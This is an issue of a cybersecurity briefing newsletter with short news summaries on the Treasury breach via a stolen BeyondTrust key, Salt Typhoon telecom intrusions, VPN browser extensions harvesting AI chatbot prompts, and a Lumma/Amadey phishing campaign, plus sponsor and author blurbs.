Daily Signal Note: Stolen Keys | Unpatched Perimeters

Welcome reader, here’s today’s Cyber Briefing Note.

Brought to you by:

Smallstep – Secures Wi-Fi, VPNs, ZTNA, SaaS and APIs with hardware-bound credentials powered by ACME Device Attestation

 LockThreat – AI-powered GRC that replaces legacy tools and unifies compliance, risk, audit and vendor management in one platform

CybersecurityHQ provides analyst-grade cyber intelligence used by CISOs and security leaders inside the Fortune 100. Each briefing identifies structural security failures and decision breakdowns across identity, machine trust, third-party access, and enterprise attack surfaces. This work exists to inform executive judgment, not to react to headlines.

—

Subscriber access includes weekly CISO briefings, deep-dive intelligence reports, premium research, and supporting tools. Corporate plans available.

Listen to the 2-minute Daily CISO Briefing on Spotify.

SIGNAL 1: Treasury Breach via Third-Party Remote Support Key

Chinese state-sponsored actors accessed U.S. Treasury Department workstations through BeyondTrust's Remote Support SaaS platform. The threat actor gained access to a key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices end users. With access to the stolen key, the threat actor was able to override the service's security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users. BeyondTrust revoked the stolen API key and shut down all compromised instances of the tool.

SIGNAL 2: Salt Typhoon Scope Expands to Nine U.S. Telecoms

The White House said Friday that nine telecom companies were impacted by the Chinese espionage effort. In one incident response case, attackers obtained credentials to one administrator account that had access to over 100,000 routers. Some of the vulnerabilities exploited by Salt Typhoon go back to 2018. Patches were issued, but the telecom companies never implemented them. The White House has outlined four areas where telecom companies can improve their cybersecurity: configuration management, vulnerability management, network segmentation, and sector-wide information sharing.

SIGNAL 3: Browser Extensions Observed Collecting AI Chatbot Inputs

Urban VPN Proxy, a Google Chrome and Microsoft Edge extension with more than 7.3 million installations, was observed stealthily gathering prompts entered by users into AI-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality. Collectively, these add-ons were installed more than eight million times.

SIGNAL 4: Lumma/Amadey Campaign Targeting Industrial Sector

A new attack aimed at industrial market players uses Lumma Stealer and Amadey Bot. The former hunts for valuable information, the latter takes control over the infected systems. It all starts with phishing emails with URLs leading users to download LNK files disguised as PDFs. The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded. PowerShell and Windows Management Instrumentation commands are utilized to collect detailed information about the victim's system.

Author
Daniel Michan is the founder of CybersecurityHQ, a CISO-grade intelligence platform read weekly across the Fortune 100. He analyzes identity-centric risk, machine identity failures, SaaS integration breakdowns, and emerging AI-speed threats, producing executive briefings and deep-dive research used by enterprise security leaders for decision support.